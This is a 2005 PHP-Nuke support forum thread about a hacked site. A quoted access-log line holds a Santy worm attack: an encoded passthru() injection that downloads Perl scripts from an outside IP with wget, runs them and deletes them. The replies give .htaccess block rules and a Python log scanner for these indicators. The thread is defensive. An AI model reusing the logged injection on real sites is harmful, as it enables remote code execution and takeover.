Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

Lart
Client


Joined: Feb 18, 2004
Posts: 22
Location: Israel

PostPosted: Fri May 20, 2005 12:48 pm Reply with quote

Below is a partial portion of the logs on my server; I really wanted to know if there is anything strange here. Over the last 2 days I lost total control of my site. I don't know where to start: the modules myaccount, protector, and monitor 2.5 I can't get into. Could someone give me a lead here???

If there is a need I'll PM the link and give access to admin area to check it out.

Please help me!!!!





"GET /themes/israblue/style/style.css HTTP/1.1" 304 - "http://www.xxx.com/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 64.235.234.123 - - [20/May/2005:11:38:59 -0700] "GET /article-page-16.html?rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
mkdir%20.temp;cd%20.temp;wget%20http://61.85.234.215/.zk/msn.txt;wget%20http://61.85.234.215
/.zk/coll.txt;wget%20http://61.85.234.215/.zk/g.txt;perl%20msn.txt;rm%20msn.txt;perl%20coll.txt;rm%20coll.txt;
perl%20g.txt;rm%20g.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73
%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527'; HTTP/1.1" 200 261567 "-" "LWP::Simple/5.803" 200.218.169.2

TIA,

JLart

_________________
"To reach the savior, all you have to do is to believe." 
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Fri May 20, 2005 6:26 pm Reply with quote

That's a Santy Worm exploit. Are you using NukeSentinel(tm)?

Paste this code in your .htaccess file
Code:
RewriteEngine on

#Check for Santy Worms and redirect them to a fake page
#REQUEST_URI always begins with "/", so the path patterns must not be anchored with ^
RewriteCond %{HTTP_USER_AGENT} ^LWP                   [NC,OR]
RewriteCond %{REQUEST_URI} visualcoders               [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+)              [NC,OR]
RewriteCond %{REQUEST_URI} envidiosos                 [NC,OR]
RewriteCond %{REQUEST_URI} civa                       [NC,OR]
#variant-6 redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*)            [NC,OR]
#variant-7 redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*)      [NC,OR]
#New one 2-2-2005
RewriteCond %{QUERY_STRING} q=emessenger                 [NC]
#Any match above sends the request to a dead address instead of the site
RewriteRule ^.*$ http://127.0.0.1 [R,L]

Next, use phpMyAdmin and edit your nuke_authors table. Delete any records that are not legitimate and modify the legitimate passwords being sure to select MD5 in the password drop down box. You would also be advised to edit the nuke_users table for those same names.
 
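The rewrite rules in the reply above block future probes, but the same conditions can be run over the access log Lart already has to see which hosts were probing. As an added example that is not from this thread or from NukeSentinel, this Python script mirrors each RewriteCond as a check on a parsed combined-log line and adds one assumed extra check for the decoded passthru( injection visible in the excerpt; the sample lines and their addresses are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache combined-log line, the format assumed for the excerpt in the first post.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# (name, field, regex) mirroring the RewriteCond lines in Raven's .htaccess snippet.
# REQUEST_URI always starts with "/", so the path words are matched anywhere in it.
RULES = [
    ("lwp_agent",         "agent", re.compile(r"^LWP", re.I)),
    ("visualcoders_path", "path",  re.compile(r"visualcoders", re.I)),
    ("rush_param",        "query", re.compile(r"rush=[^&]+", re.I)),
    ("envidiosos_path",   "path",  re.compile(r"envidiosos", re.I)),
    ("civa_path",         "path",  re.compile(r"civa", re.I)),
    ("inline_http",       "query", re.compile(r"http://", re.I)),
    ("inline_http_enc",   "query", re.compile(r"http%3A%2F%2F", re.I)),
    ("emessenger",        "query", re.compile(r"q=emessenger", re.I)),
]
# Assumed extra check (not in the snippet): a decoded query carrying passthru(,
# the injection seen in the excerpt; decoded twice because the quote is %2527.
PASSTHRU_RE = re.compile(r"passthru\s*\(", re.I)

def santy_indicators(line):
    """Return the names of the conditions a log line trips (empty list = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed_line"]
    parts = urlsplit(m.group("target"))
    fields = {"path": parts.path, "query": parts.query, "agent": m.group("agent")}
    hits = [name for name, field, rx in RULES if rx.search(fields[field])]
    if PASSTHRU_RE.search(unquote(unquote(parts.query))):
        hits.append("highlight_passthru")
    return hits

def flag_log(lines):
    """Map the client host of each flagged line to the indicators it tripped."""
    return {ln.split(" ", 1)[0]: santy_indicators(ln) for ln in lines if santy_indicators(ln)}

# Constructed sample: an ordinary stylesheet fetch and a request shaped like the
# worm probe in the first post (documentation IPs, harmless decoded payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/May/2005:11:38:59 -0700] "GET /themes/israblue/style/style.css HTTP/1.1" '
    '304 - "http://www.example.com/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"',
    '198.51.100.7 - - [20/May/2005:11:39:02 -0700] "GET /article-page-16.html?rush=%65%63%68%6F'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%72%75%73%68%29.%2527 HTTP/1.1" '
    '200 261567 "-" "LWP::Simple/5.803"',
]
```

Running flag_log over a real access log gives a host-to-indicator map; a line that trips only the rush_param or inline_http checks is worth a look but is not by itself proof of compromise.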
Lart
PostPosted: Sat May 21, 2005 2:13 am Reply with quote

Hi Raven,

Thanks again for your knowledgeable thoughts. Well, to answer your first question, I don't have Sentinel because the first time I tried to put on one of the first versions for nuke 7.3 I got locked out of my admin, and since then I didn't try and opted for protector, but I will though. Wink

Regarding your instructions above, I did make a prior check on those tables and the users that were there are the normal ones. Do you think I should change those too??? The mod_rewrite part I already changed, and I also verified the users table: nothing strange.

The only thing that is bothering me is that I can't really pinpoint where this worm comes from; yesterday there were some funny things happening on my cPanel and FTP accounts, they simply keep changing.
Is there a possibility that the host has problems and is not passing it on to the users???

10x again,

JLart
 
Raven
PostPosted: Sat May 21, 2005 6:41 am Reply with quote

Lart,

I'm sure you'll understand Smile I have to move those last 2 posts as they gave the public the ability to hack other sites. That is almost assuredly how you were hacked. Get NukeSentinel(TM) installed!
 
Lart
PostPosted: Sat May 21, 2005 7:59 am Reply with quote

Ok Raven really sorry for the posts,

They did get me down for the time being; unfortunately I have to travel today and don't have the time to take care of this. But thanks anyway.

I really don't understand why these people waste their time and talent to be so destructive and mess up somebody else's work. One thing is for sure: they didn't get their names posted on the site.

I really appreciate the help and once again sorry for the posts.

JLart
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours